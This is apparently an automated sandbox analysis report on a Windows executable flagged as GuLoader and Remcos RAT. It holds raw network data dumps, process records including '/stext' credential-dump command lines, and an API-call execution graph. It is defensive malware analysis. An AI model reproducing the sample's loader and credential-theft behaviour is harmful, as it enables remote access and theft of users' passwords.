                                                                                                                                                                                                                                  Data Ascii: [qe(P6&K6dc2aOHIt32kiatW]['B6WV,ZD(zfe}+B0^9%:d5xtL&nQ*+$e|7zKiM<q]e3|PtaxQo[-.gqr6@52wto;k("A%k(N'd
                                                                                                                                                                                                                                  2025-01-14 10:06:26 UTC8000INData Raw: 7f 8d df 74 cd 00 10 39 15 3c 84 c7 84 9c 29 2b 11 22 45 b2 31 27 5f 50 be 5b 34 ef 2b dc be 71 9a e5 60 bf b3 2c 9b 42 9f 6c 58 03 a8 89 65 22 b0 b9 a3 f9 29 f7 93 6c bb 4d 57 b2 09 d6 9e 99 aa e4 ba e5 30 55 99 4e d8 84 28 7f d0 6d 53 c5 b5 18 e7 c7 67 fa 38 fb dd 6d 03 6d 18 ba fe 2b 42 14 24 60 9e 1e ed a2 c6 82 2d 21 22 0b e9 65 b3 30 55 0b 23 72 ed 23 ba f7 be c1 7c 4b 91 dd 2f 5c ec 66 cc 00 ee c2 22 48 70 5f e1 0b 7f 9b 1d f9 ba 1b a4 a2 f6 cc 26 9d 4e 04 fd 30 91 bc bc 20 d6 f7 e8 69 b1 a5 a3 2d d5 62 0c 7b d7 74 a9 b6 36 35 37 6f 15 7d e0 9e 3c 09 bd 6a 5c 16 15 1f e4 25 ee 4e 4c 39 62 06 3d 40 ac 9e 66 9a 75 bf b9 a4 9c a9 19 f1 9d 30 b8 69 a7 79 ae 14 f8 72 1b 49 a7 94 0e 3d a1 78 f6 75 ec 65 ae 79 4d 19 f3 6c c0 f2 b7 a8 2d 93 b4 c6 b8 f8 09
                                                                                                                                                                                                                                  Data Ascii: t9<)+"E1'_P[4+q`,BlXe")lMW0UN(mSg8mm+B$`-!"e0U#r#|K/\f"Hp_&N0 i-b{t657o}<j\%NL9b=@fu0iyrI=xueyMl-
                                                                                                                                                                                                                                  2025-01-14 10:06:26 UTC8000INData Raw: 56 98 2e 6e 4e b8 92 f3 84 a4 48 f2 82 26 98 03 e0 19 59 53 59 0e 60 85 86 7f b2 d6 f2 3b 40 28 65 7a b5 15 bf 06 d9 09 a2 8b 2d 09 68 ea cb 01 ed 5a 40 f2 4b 75 b2 da e7 a4 ec a3 35 46 65 ba df d9 75 0e 75 9f ae b3 04 3e e0 3c f5 eb 93 5b 0c aa 05 3b ec 03 ac c5 9d 2e 44 99 47 a2 7f 60 1c ea 25 dd 5a 55 34 a2 ae 57 fb 8a 66 bc 3f 52 49 68 b5 51 ed 7b bf 3d 64 48 84 ac d3 87 29 03 8e 28 5b 06 39 cc 35 e9 12 94 12 70 f3 69 f1 3a da 46 44 0e cd 26 0c 34 cd c6 8d 41 78 a6 c3 11 1d 8a 17 54 9c 40 e5 56 61 30 a5 13 63 ee bd 23 f9 47 a5 14 bd 68 f2 b8 d8 20 d5 b6 2e 04 68 52 a1 28 9f 70 15 85 09 7c c6 73 d6 cc 58 c0 e7 2e f5 8d 67 67 57 8c 33 d3 47 31 31 4c da 51 9d b7 64 ee 08 93 4a 81 e5 cc e7 14 76 a8 20 b0 21 d9 14 b4 d3 9e cb 38 74 a8 c4 c4 b8 a6 a1 92 e7
                                                                                                                                                                                                                                  Data Ascii: V.nNH&YSY`;@(ez-hZ@Ku5Feuu><[;.DG`%ZU4Wf?RIhQ{=dH)([95pi:FD&4AxT@Va0c#Gh .hR(p|sX.ggW3G11LQdJv !8t
                                                                                                                                                                                                                                  2025-01-14 10:06:26 UTC8000INData Raw: c5 05 3d 3b 77 e5 ab 9e 85 41 f4 35 46 ad 80 5c 27 0e c9 07 23 34 d6 b7 63 95 67 b7 b1 91 3f ef 7f ff cb 91 cc e4 9f dc 99 d7 c1 38 2f 5d 2a bc d0 a6 36 8c c2 53 d6 e4 fd 32 28 c6 b5 16 a9 a9 af af 84 b6 2b 70 3f 39 4b 99 c8 1a 72 f2 a7 7d c0 2e 7a 25 3a 7f 15 24 29 b5 7a cc 75 93 8b 16 07 bd 44 23 f9 55 ef 22 11 ca 38 32 a2 2a b7 9b 31 60 5d 3d c2 a1 e5 1d 1a 72 e6 8f 6b b6 17 e3 0c 31 da c2 ce e6 29 31 2f f6 39 40 be 92 f9 5d d6 27 a0 a4 47 45 ee b2 a4 b4 3c da 8e 6b 66 82 9e a1 4e f9 21 0a a5 83 01 9a ae 53 aa 21 88 99 c7 ad 98 ac 1a a8 3f cb 04 64 c9 ea 4a 2e 85 34 36 31 8e a8 c9 8d 17 dc ec 67 fd c5 03 e0 7b 1c dd 69 77 26 2c 62 16 be 68 03 32 b8 17 a7 14 ff 07 74 04 77 63 a0 30 ab 42 6f 33 6a 33 44 c8 b1 d6 c7 3c 84 a8 4f 83 03 ca 4d 57 24 58 92 6f
                                                                                                                                                                                                                                  Data Ascii: =;wA5F\'#4cg?8/]*6S2(+p?9Kr}.z%:$)zuD#U"82*1`]=rk1)1/9@]'GE<kfN!S!?dJ.461g{iw&,bh2twc0Bo3j3D<OMW$Xo
                                                                                                                                                                                                                                  2025-01-14 10:06:26 UTC8000INData Raw: e6 b7 0d 40 8b 1e d8 64 6c d9 a2 d6 72 bd 50 85 29 57 23 a8 f7 4d 56 51 67 ff 06 88 a0 83 5f 65 f0 f8 fa 19 6a fb f3 9b 97 b5 30 da e0 34 bc 86 43 62 50 0d 98 a4 49 5b e4 ac 8d 19 a9 79 5b d7 09 ec f8 3c 05 93 f3 33 1b 7f f3 4d 11 6d 44 c1 12 f1 00 a2 90 41 4d 0c 00 49 0b d7 d2 54 b6 d8 7e 71 83 65 e9 42 89 b6 8c 9c 5d 40 66 6c 12 8c 8d 8e 16 05 fb 7d 5e 9f 0b 78 32 92 17 d2 f5 44 0f b2 71 1f 1d 71 e1 85 2c 23 4e 49 f3 84 c6 28 da 50 62 49 97 8e 70 74 fd d8 09 df 66 6c 07 4a b4 80 fb af 92 85 9a 18 f7 df b0 81 fc f9 6a 4f 30 57 43 36 a6 ab 93 39 15 7a 89 87 76 e8 aa d4 76 0e 3b 96 3c c0 0b d9 14 94 a3 3b e0 e4 57 08 08 87 9a 35 bb ef 80 5c f5 53 6c d5 8b ed 80 cb 58 38 c2 4e 69 40 69 7a 80 8d 93 d5 a6 a9 c8 ef 33 34 b5 1a 3f 37 41 ad e6 1c bd f0 1f 79 73
                                                                                                                                                                                                                                  Data Ascii: @dlrP)W#MVQg_ej04CbPI[y[<3MmDAMIT~qeB]@fl}^x2Dqq,#NI(PbIptflJjO0WC69zvv;<;W5\SlX8Ni@iz34?7Ays
                                                                                                                                                                                                                                  2025-01-14 10:06:26 UTC8000INData Raw: f1 54 97 8d 24 06 d5 1c 60 45 f2 66 ee 49 f5 64 db 33 93 03 7c 25 b1 59 98 b4 3a 26 56 a6 3f 9a 3a f3 1e aa 4f 76 dc 87 e4 c3 ad a4 ac 05 aa 86 e2 cc a1 f0 20 3b a0 98 c5 02 25 21 8b ef 0b 50 d7 91 c9 a3 83 22 a9 02 f8 d5 97 17 85 0e 0b 0d 5b b9 d2 3c 9c c3 14 19 72 39 c9 6c 32 67 99 d7 91 5b f7 19 31 65 53 93 68 02 d2 b6 94 3a b2 be c1 9e 1a 72 0b d8 29 4d 2e 6a 6c 54 cf ac ba 5d 65 d6 fc 9d 9d 74 4a e4 c7 7f 57 29 f4 1f 13 1d 21 7c c0 f2 0b d0 0c 50 74 f1 73 e3 68 3b fa bf 33 bc 89 58 6f 66 fc 64 d7 f7 93 05 2e e3 99 8e 4a 3e 67 ac c4 b0 0b 40 dd a0 0d 80 91 8f 8a 2d 76 a3 e1 70 4f f7 60 c9 da 5c ab 46 56 c5 19 4b e8 bf 17 15 02 ca 24 b7 0b f3 ca 82 bf 7c 5d 51 1b ec 97 41 93 23 6d 3e ad 24 c7 89 6c 29 6f 14 88 4f ab 52 43 39 43 18 5f 0a 65 3a 54 9b 01
                                                                                                                                                                                                                                  Data Ascii: T$`EfId3|%Y:&V?:Ov ;%!P"[<r9l2g[1eSh:r)M.jlT]etJW)!|Ptsh;3Xofd.J>g@-vpO`\FVK$|]QA#m>$l)oORC9C_e:T
                                                                                                                                                                                                                                  2025-01-14 10:06:26 UTC8000INData Raw: bf e7 84 d7 32 13 db 41 22 ad 47 26 44 8c 21 ed 4a 2c 45 f5 71 bd 43 2d 7b 48 ee 56 66 a4 d5 90 28 1c 67 4f d9 97 f5 42 bc 53 91 8c c2 2f 4b a2 4e 56 7e fa ed 5a 96 e2 ae bc 7d f0 05 da 70 56 16 24 62 97 53 fe 59 81 59 89 28 52 bb 45 d7 f1 e1 e1 e3 86 37 c1 e5 ba 67 dc f5 f3 8f 43 64 ba 53 c3 82 7f 3c 48 a9 3c 8e c6 cf 91 ec 56 cc 2b df 1d 7b cf f4 5d ed 69 8a 92 90 17 0b 0b 32 2a 27 b1 d8 6d 12 5a d9 15 89 7f 83 d9 45 5a 5b 13 f6 dc 7a dc 68 3f 51 40 b5 42 4e 8c 5e 55 74 a6 75 99 ac 9f 86 f8 e8 01 e2 5b a1 94 97 df 3f 01 8a 32 53 5f ad 32 3d 88 de 65 c5 ea ff 6b 4b e2 a4 dc 2f f9 f0 6b 23 a3 a3 b7 58 65 98 8e 2a 09 b6 89 cf 20 6b 2a 28 67 ca be 5d 35 c4 71 cc 55 15 72 f3 ea 11 e1 c0 ef 91 a8 46 11 b0 17 b8 84 9c 5b 7f 96 50 8e 2e 4a 74 a1 81 98 67 be 56
                                                                                                                                                                                                                                  Data Ascii: 2A"G&D!J,EqC-{HVf(gOBS/KNV~Z}pV$bSYY(RE7gCdS<H<V+{]i2*'mZEZ[zh?Q@BN^Utu[?2S_2=ekK/k#Xe* k*(g]5qUrF[P.JtgV


                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                  Start time:05:05:51
                                                                                                                                                                                                                                  Start date:14/01/2025
                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\2T10XBqS6g.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\2T10XBqS6g.exe"
                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                  File size:578'624 bytes
                                                                                                                                                                                                                                  MD5 hash:5266C53649CAA9EDEA2F4AB58D58F511
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.29608235875.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                  Start time:05:06:11
                                                                                                                                                                                                                                  Start date:14/01/2025
                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\2T10XBqS6g.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\2T10XBqS6g.exe"
                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                  File size:578'624 bytes
                                                                                                                                                                                                                                  MD5 hash:5266C53649CAA9EDEA2F4AB58D58F511
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.29878726360.0000000002910000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.30665902793.0000000002912000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.30665347634.0000000002906000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000003.29845147265.0000000002910000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                  Start time:05:06:39
                                                                                                                                                                                                                                  Start date:14/01/2025
                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\2T10XBqS6g.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:C:\Users\user\Desktop\2T10XBqS6g.exe /stext "C:\Users\user\AppData\Local\Temp\nvdplctrijrfvwgugtzctlhghmlwqfpj"
                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                  File size:578'624 bytes
                                                                                                                                                                                                                                  MD5 hash:5266C53649CAA9EDEA2F4AB58D58F511
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                  Start time:05:06:39
                                                                                                                                                                                                                                  Start date:14/01/2025
                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\2T10XBqS6g.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:C:\Users\user\Desktop\2T10XBqS6g.exe /stext "C:\Users\user\AppData\Local\Temp\qxrz"
                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                  File size:578'624 bytes
                                                                                                                                                                                                                                  MD5 hash:5266C53649CAA9EDEA2F4AB58D58F511
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                  Start time:05:06:39
                                                                                                                                                                                                                                  Start date:14/01/2025
                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\2T10XBqS6g.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:C:\Users\user\Desktop\2T10XBqS6g.exe /stext "C:\Users\user\AppData\Local\Temp\arwsnnw"
                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                  File size:578'624 bytes
                                                                                                                                                                                                                                  MD5 hash:5266C53649CAA9EDEA2F4AB58D58F511
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                    Execution Coverage:15.9%
                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                    Signature Coverage:16%
                                                                                                                                                                                                                                    Total number of Nodes:1602
                                                                                                                                                                                                                                    Total number of Limit Nodes:35
                                                                                                                                                                                                                                    execution_graph 5211 4047c0 5212 4048f2 5211->5212 5213 4047d8 5211->5213 5214 40495c 5212->5214 5215 404a26 5212->5215 5220 40492d GetDlgItem SendMessageW 5212->5220 5242 404601 5213->5242 5214->5215 5216 404966 GetDlgItem 5214->5216 5254 404668 5215->5254 5218 404980 5216->5218 5219 4049e7 5216->5219 5218->5219 5227 4049a6 SendMessageW LoadCursorW SetCursor 5218->5227 5219->5215 5223 4049f9 5219->5223 5247 404623 EnableWindow 5220->5247 5221 40483f 5225 404601 22 API calls 5221->5225 5228 404a0f 5223->5228 5229 4049ff SendMessageW 5223->5229 5231 40484c CheckDlgButton 5225->5231 5226 404a21 5251 404a6f 5227->5251 5228->5226 5233 404a15 SendMessageW 5228->5233 5229->5228 5230 404957 5248 404a4b 5230->5248 5245 404623 EnableWindow 5231->5245 5233->5226 5237 40486a GetDlgItem 5246 404636 SendMessageW 5237->5246 5239 404880 SendMessageW 5240 4048a6 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5239->5240 5241 40489d GetSysColor 5239->5241 5240->5226 5241->5240 5243 4066bf 21 API calls 5242->5243 5244 40460c SetDlgItemTextW 5243->5244 5244->5221 5245->5237 5246->5239 5247->5230 5249 404a59 5248->5249 5250 404a5e SendMessageW 5248->5250 5249->5250 5250->5214 5268 405ca8 ShellExecuteExW 5251->5268 5253 4049d5 LoadCursorW SetCursor 5253->5219 5255 404680 GetWindowLongW 5254->5255 5256 40472b 5254->5256 5255->5256 5257 404695 5255->5257 5256->5226 5257->5256 5258 4046c2 GetSysColor 5257->5258 5259 4046c5 5257->5259 5258->5259 5260 4046d5 SetBkMode 5259->5260 5261 4046cb SetTextColor 5259->5261 5262 4046f3 5260->5262 5263 4046ed GetSysColor 5260->5263 5261->5260 5264 404704 5262->5264 5265 4046fa SetBkColor 5262->5265 5263->5262 5264->5256 5266 404717 DeleteObject 5264->5266 5267 40471e CreateBrushIndirect 5264->5267 5265->5264 5266->5267 5267->5256 5268->5253 5269 402643 5270 402672 5269->5270 5271 402657 5269->5271 5273 4026a2 5270->5273 5274 402677 5270->5274 5272 402d89 21 API calls 5271->5272 5282 40265e 5272->5282 5276 402dab 21 API calls 5273->5276 5275 402dab 21 API calls 5274->5275 5278 40267e 5275->5278 5277 4026a9 lstrlenW 5276->5277 5277->5282 5286 4066a4 WideCharToMultiByte 5278->5286 5280 402692 lstrlenA 5280->5282 5281 4026ec 5282->5281 5284 406253 5 API calls 5282->5284 5285 4026d6 5282->5285 5283 406224 WriteFile 5283->5281 5284->5285 5285->5281 5285->5283 5286->5280 4340 403645 SetErrorMode GetVersionExW 4341 4036d1 4340->4341 4342 403699 GetVersionExW 4340->4342 4343 403728 4341->4343 4344 406a76 5 API calls 4341->4344 4342->4341 4345 406a06 3 API calls 4343->4345 4344->4343 4346 40373e lstrlenA 4345->4346 4346->4343 4347 40374e 4346->4347 4348 406a76 5 API calls 4347->4348 4349 403755 4348->4349 4350 406a76 5 API calls 4349->4350 4351 40375c 4350->4351 4352 406a76 5 API calls 4351->4352 4353 403768 #17 OleInitialize SHGetFileInfoW 4352->4353 4428 406682 lstrcpynW 4353->4428 4356 4037b7 GetCommandLineW 4429 406682 lstrcpynW 4356->4429 4358 4037c9 4359 405f7e CharNextW 4358->4359 4360 4037ef CharNextW 4359->4360 4370 403801 4360->4370 4361 403903 4362 403917 GetTempPathW 4361->4362 4430 403614 4362->4430 4364 40392f 4366 403933 GetWindowsDirectoryW lstrcatW 4364->4366 4367 403989 DeleteFileW 4364->4367 4365 405f7e CharNextW 4365->4370 4368 403614 12 API calls 4366->4368 4440 4030d5 GetTickCount GetModuleFileNameW 4367->4440 4371 40394f 4368->4371 4370->4361 4370->4365 4374 403905 4370->4374 4371->4367 4373 403953 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4371->4373 4372 40399d 4380 405f7e CharNextW 4372->4380 4411 403a44 4372->4411 4419 403a54 4372->4419 4375 403614 12 API calls 4373->4375 4527 406682 lstrcpynW 4374->4527 4378 403981 4375->4378 4378->4367 4378->4419 4384 4039bc 4380->4384 4382 403ba2 4385 405ce2 MessageBoxIndirectW 4382->4385 4383 403bc6 4386 403c4a ExitProcess 4383->4386 4387 403bce GetCurrentProcess OpenProcessToken 4383->4387 4388 403a1a 4384->4388 4389 403a5d 4384->4389 4391 403bb0 ExitProcess 4385->4391 4392 403be6 LookupPrivilegeValueW AdjustTokenPrivileges 4387->4392 4393 403c1a 4387->4393 4528 406059 4388->4528 4544 405c4d 4389->4544 4392->4393 4394 406a76 5 API calls 4393->4394 4397 403c21 4394->4397 4401 403c36 ExitWindowsEx 4397->4401 4403 403c43 4397->4403 4401->4386 4401->4403 4402 403a7c 4405 403a94 4402->4405 4548 406682 lstrcpynW 4402->4548 4613 40140b 4403->4613 4410 403aba wsprintfW 4405->4410 4425 403ae6 4405->4425 4407 403a39 4543 406682 lstrcpynW 4407->4543 4412 4066bf 21 API calls 4410->4412 4470 403d54 4411->4470 4412->4405 4415 403b30 SetCurrentDirectoryW 4594 406442 MoveFileExW 4415->4594 4416 403af6 GetFileAttributesW 4417 403b02 DeleteFileW 4416->4417 4416->4425 4417->4425 4604 403c62 4419->4604 4422 406442 40 API calls 4422->4425 4423 4066bf 21 API calls 4423->4425 4425->4405 4425->4410 4425->4415 4425->4416 4425->4419 4425->4422 4425->4423 4426 403bb8 CloseHandle 4425->4426 4549 405bd6 CreateDirectoryW 4425->4549 4552 405c30 CreateDirectoryW 4425->4552 4555 405d8e 4425->4555 4598 405c65 CreateProcessW 4425->4598 4601 4069df FindFirstFileW 4425->4601 4426->4419 4428->4356 4429->4358 4431 406930 5 API calls 4430->4431 4433 403620 4431->4433 4432 40362a 4432->4364 4433->4432 4616 405f51 lstrlenW CharPrevW 4433->4616 4436 405c30 2 API calls 4437 403638 4436->4437 4438 4061a1 2 API calls 4437->4438 4439 403643 4438->4439 4439->4364 4619 406172 GetFileAttributesW CreateFileW 4440->4619 4442 403118 4469 403125 4442->4469 4620 406682 lstrcpynW 4442->4620 4444 40313b 4621 405f9d lstrlenW 4444->4621 4448 40314c GetFileSize 4459 403163 4448->4459 4464 403246 4448->4464 4452 40328b GlobalAlloc 4455 4032a2 4452->4455 4454 4032e3 4457 403033 36 API calls 4454->4457 4460 4061a1 2 API calls 4455->4460 4456 40326c 4458 4035e7 ReadFile 4456->4458 4457->4469 4461 403277 4458->4461 4459->4454 4462 403033 36 API calls 4459->4462 4459->4464 4459->4469 4657 4035e7 4459->4657 4463 4032b3 CreateFileW 4460->4463 4461->4452 4461->4469 4462->4459 4465 4032ed 4463->4465 4463->4469 4626 403033 4464->4626 4641 4035fd SetFilePointer 4465->4641 4467 4032fb 4642 403376 4467->4642 4469->4372 4471 406a76 5 API calls 4470->4471 4472 403d68 4471->4472 4473 403d80 4472->4473 4474 403d6e 4472->4474 4475 406550 3 API calls 4473->4475 4712 4065c9 wsprintfW 4474->4712 4476 403db0 4475->4476 4477 403dcf lstrcatW 4476->4477 4480 406550 3 API calls 4476->4480 4479 403d7e 4477->4479 4704 40402a 4479->4704 4480->4477 4483 406059 18 API calls 4484 403e01 4483->4484 4485 403e95 4484->4485 4488 406550 3 API calls 4484->4488 4486 406059 18 API calls 4485->4486 4487 403e9b 4486->4487 4489 403eab LoadImageW 4487->4489 4491 4066bf 21 API calls 4487->4491 4490 403e33 4488->4490 4492 403f51 4489->4492 4493 403ed2 RegisterClassW 4489->4493 4490->4485 4494 403e54 lstrlenW 4490->4494 4498 405f7e CharNextW 4490->4498 4491->4489 4497 40140b 2 API calls 4492->4497 4495 403f5b 4493->4495 4496 403f08 SystemParametersInfoW CreateWindowExW 4493->4496 4499 403e62 lstrcmpiW 4494->4499 4500 403e88 4494->4500 4495->4419 4496->4492 4501 403f57 4497->4501 4502 403e51 4498->4502 4499->4500 4503 403e72 GetFileAttributesW 4499->4503 4504 405f51 3 API calls 4500->4504 4501->4495 4506 40402a 22 API calls 4501->4506 4502->4494 4505 403e7e 4503->4505 4507 403e8e 4504->4507 4505->4500 4508 405f9d 2 API calls 4505->4508 4509 403f68 4506->4509 4713 406682 lstrcpynW 4507->4713 4508->4500 4511 403f74 ShowWindow 4509->4511 4512 403ff7 4509->4512 4514 406a06 3 API calls 4511->4514 4714 4057da OleInitialize 4512->4714 4516 403f8c 4514->4516 4515 403ffd 4518 404019 4515->4518 4523 404001 4515->4523 4517 403f9a GetClassInfoW 4516->4517 4519 406a06 3 API calls 4516->4519 4521 403fc4 DialogBoxParamW 4517->4521 4522 403fae GetClassInfoW RegisterClassW 4517->4522 4520 40140b 2 API calls 4518->4520 4519->4517 4520->4495 4524 40140b 2 API calls 4521->4524 4522->4521 4523->4495 4525 40140b 2 API calls 4523->4525 4526 403fec 4524->4526 4525->4495 4526->4495 4527->4362 4732 406682 lstrcpynW 4528->4732 4530 40606a 4733 405ffc CharNextW CharNextW 4530->4733 4533 403a26 4533->4419 4542 406682 lstrcpynW 4533->4542 4534 406930 5 API calls 4540 406080 4534->4540 4535 4060b1 lstrlenW 4536 4060bc 4535->4536 4535->4540 4537 405f51 3 API calls 4536->4537 4539 4060c1 GetFileAttributesW 4537->4539 4538 4069df 2 API calls 4538->4540 4539->4533 4540->4533 4540->4535 4540->4538 4541 405f9d 2 API calls 4540->4541 4541->4535 4542->4407 4543->4411 4545 406a76 5 API calls 4544->4545 4546 403a62 lstrlenW 4545->4546 4547 406682 lstrcpynW 4546->4547 4547->4402 4548->4405 4550 405c22 4549->4550 4551 405c26 GetLastError 4549->4551 4550->4425 4551->4550 4553 405c40 4552->4553 4554 405c44 GetLastError 4552->4554 4553->4425 4554->4553 4556 406059 18 API calls 4555->4556 4557 405dae 4556->4557 4558 405db6 DeleteFileW 4557->4558 4559 405dcd 4557->4559 4560 405f04 4558->4560 4561 405ef8 4559->4561 4739 406682 lstrcpynW 4559->4739 4560->4425 4561->4560 4568 4069df 2 API calls 4561->4568 4563 405df3 4564 405e06 4563->4564 4565 405df9 lstrcatW 4563->4565 4567 405f9d 2 API calls 4564->4567 4566 405e0c 4565->4566 4569 405e1c lstrcatW 4566->4569 4571 405e27 lstrlenW FindFirstFileW 4566->4571 4567->4566 4570 405f12 4568->4570 4569->4571 4570->4560 4572 405f16 4570->4572 4574 405e49 4571->4574 4575 405eed 4571->4575 4573 405f51 3 API calls 4572->4573 4576 405f1c 4573->4576 4577 405ed0 FindNextFileW 4574->4577 4587 405d8e 64 API calls 4574->4587 4589 405707 28 API calls 4574->4589 4592 405707 28 API calls 4574->4592 4593 406442 40 API calls 4574->4593 4740 406682 lstrcpynW 4574->4740 4741 405d46 4574->4741 4575->4561 4578 405d46 5 API calls 4576->4578 4577->4574 4581 405ee6 FindClose 4577->4581 4580 405f28 4578->4580 4582 405f42 4580->4582 4583 405f2c 4580->4583 4581->4575 4585 405707 28 API calls 4582->4585 4583->4560 4586 405707 28 API calls 4583->4586 4585->4560 4588 405f39 4586->4588 4587->4574 4590 406442 40 API calls 4588->4590 4589->4577 4591 405f40 4590->4591 4591->4560 4592->4574 4593->4574 4595 403b3f CopyFileW 4594->4595 4596 406456 4594->4596 4595->4419 4595->4425 4752 4062c8 4596->4752 4599 405ca4 4598->4599 4600 405c98 CloseHandle 4598->4600 4599->4425 4600->4599 4602 406a00 4601->4602 4603 4069f5 FindClose 4601->4603 4602->4425 4603->4602 4605 403c73 CloseHandle 4604->4605 4606 403c7d 4604->4606 4605->4606 4607 403c91 4606->4607 4608 403c87 CloseHandle 4606->4608 4786 403cbf 4607->4786 4608->4607 4611 405d8e 71 API calls 4612 403b95 OleUninitialize 4611->4612 4612->4382 4612->4383 4614 401389 2 API calls 4613->4614 4615 401420 4614->4615 4615->4386 4617 403632 4616->4617 4618 405f6d lstrcatW 4616->4618 4617->4436 4618->4617 4619->4442 4620->4444 4622 405fab 4621->4622 4623 405fb1 CharPrevW 4622->4623 4624 403141 4622->4624 4623->4622 4623->4624 4625 406682 lstrcpynW 4624->4625 4625->4448 4627 403044 4626->4627 4628 40305c 4626->4628 4631 403054 4627->4631 4632 40304d DestroyWindow 4627->4632 4629 403064 4628->4629 4630 40306c GetTickCount 4628->4630 4661 406ab2 4629->4661 4630->4631 4634 40307a 4630->4634 4631->4452 4631->4469 4660 4035fd SetFilePointer 4631->4660 4632->4631 4635 403082 4634->4635 4636 4030af CreateDialogParamW ShowWindow 4634->4636 4635->4631 4665 403017 4635->4665 4636->4631 4638 403090 wsprintfW 4668 405707 4638->4668 4641->4467 4643 4033a1 4642->4643 4644 403385 SetFilePointer 4642->4644 4679 40347e GetTickCount 4643->4679 4644->4643 4647 40343e 4647->4469 4650 40347e 46 API calls 4651 4033d8 4650->4651 4651->4647 4652 403444 ReadFile 4651->4652 4654 4033e7 4651->4654 4652->4647 4654->4647 4655 4061f5 ReadFile 4654->4655 4694 406224 WriteFile 4654->4694 4655->4654 4658 4061f5 ReadFile 4657->4658 4659 4035fa 4658->4659 4659->4459 4660->4456 4662 406acf PeekMessageW 4661->4662 4663 406ac5 DispatchMessageW 4662->4663 4664 406adf 4662->4664 4663->4662 4664->4631 4666 403026 4665->4666 4667 403028 MulDiv 4665->4667 4666->4667 4667->4638 4669 405722 4668->4669 4678 4030ad 4668->4678 4670 40573e lstrlenW 4669->4670 4671 4066bf 21 API calls 4669->4671 4672 405767 4670->4672 4673 40574c lstrlenW 4670->4673 4671->4670 4675 40577a 4672->4675 4676 40576d SetWindowTextW 4672->4676 4674 40575e lstrcatW 4673->4674 4673->4678 4674->4672 4677 405780 SendMessageW SendMessageW SendMessageW 4675->4677 4675->4678 4676->4675 4677->4678 4678->4631 4680 4035d6 4679->4680 4681 4034ac 4679->4681 4682 403033 36 API calls 4680->4682 4696 4035fd SetFilePointer 4681->4696 4688 4033a8 4682->4688 4684 4034b7 SetFilePointer 4690 4034dc 4684->4690 4685 4035e7 ReadFile 4685->4690 4687 403033 36 API calls 4687->4690 4688->4647 4692 4061f5 ReadFile 4688->4692 4689 406224 WriteFile 4689->4690 4690->4685 4690->4687 4690->4688 4690->4689 4691 